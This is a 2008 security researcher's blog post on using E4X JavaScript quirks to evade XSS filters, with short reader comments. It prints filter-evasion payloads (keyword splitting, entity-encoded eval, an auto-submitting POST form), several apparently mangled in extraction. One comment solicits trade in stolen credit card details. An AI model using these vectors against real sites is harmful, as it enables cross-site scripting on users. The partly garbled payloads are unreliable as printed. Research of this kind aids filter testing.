E4X for hackers
Sunday, 7 September 2008
If you’ve not been following my sla.ckers thread on unusual javascript then your missing out. My idea was to gather interesting, weird and wonderful javascript tricks which are useful for filter evasion and coding. I investigated E4X quite a lot for this purpose and found a few cool things that I’ll share with you.
Using {} for keyword evasion
Lets say a filter disallows certain words, because the {} allows you to execute a javascript block; if you execute a block that returns a blank string then you can use it for keyword evasion. The new array constructor creates a blank array but when used in concatenation it results in a blank string.
location=javascr{new Array}ipt:aler{new Array}t(1)
Another example:-
location=javascr{[]}ipt:aler{[]}t(1)
A few more:-
<>{new String}>;
<>{''}>;
<>{new RegExp()[-1]}>;
<>{<>>}>;
Weird syntax fun
E4X also has some javascript syntax quirks that normally would cause a parsing error but it’s perfectly valid.
default xml namespace = alert(1)
Some more weird looking stuff:-
<>{eval(/alert(1)/[-1])}>..@*::xyz
(!1..@*::abc?alert:1..@*::xyz)(1)
Numbers as E4X
For some reason numbers can be used as XML
1..@Numbers/(are=1)%1..*::xml
Encoding with entities
Giorgio brought this to my attention when he was hacking my unsuccessful Firefox sandbox experiment. You can use html entities and they will be decoded when using the XML data as strings.
alert(<>">)
A more interesting example with decimal entities:-
eval(<>alert(1)>+[])
Hackvertor supports morphs which allow you to generate this sort of data automatically, useful for fuzzing XSS filters:-
E4X morph
Form creation
Making forms with E4X is lovely, check it out:-
f=<form/>;
f.@id='x';
f.@action='url.php';
f.@method='post';
f.input.@name='h'
f.input.@value=1;
document.body.innerHTML=f;
document.getElementById('x').submit();
No. 1 — October 8th, 2008 at 2:01 pm
i saw ur site and am wondering if u $ crcd details i got paypal let me know
No. 2 — October 8th, 2008 at 3:31 pm
@mark
wot r u talkin bout? nvr mind i’m not intrsd
No. 3 — January 8th, 2009 at 5:32 pm
Hi,Gareth Heyes
I just wanna know how to test or use these weird vectors.
Thanks!
No. 4 — January 8th, 2009 at 6:04 pm
@Nonove
I’ll be releasing a javascript hacking video shortly
No. 5 — January 8th, 2009 at 7:29 pm
Thanks Heyes!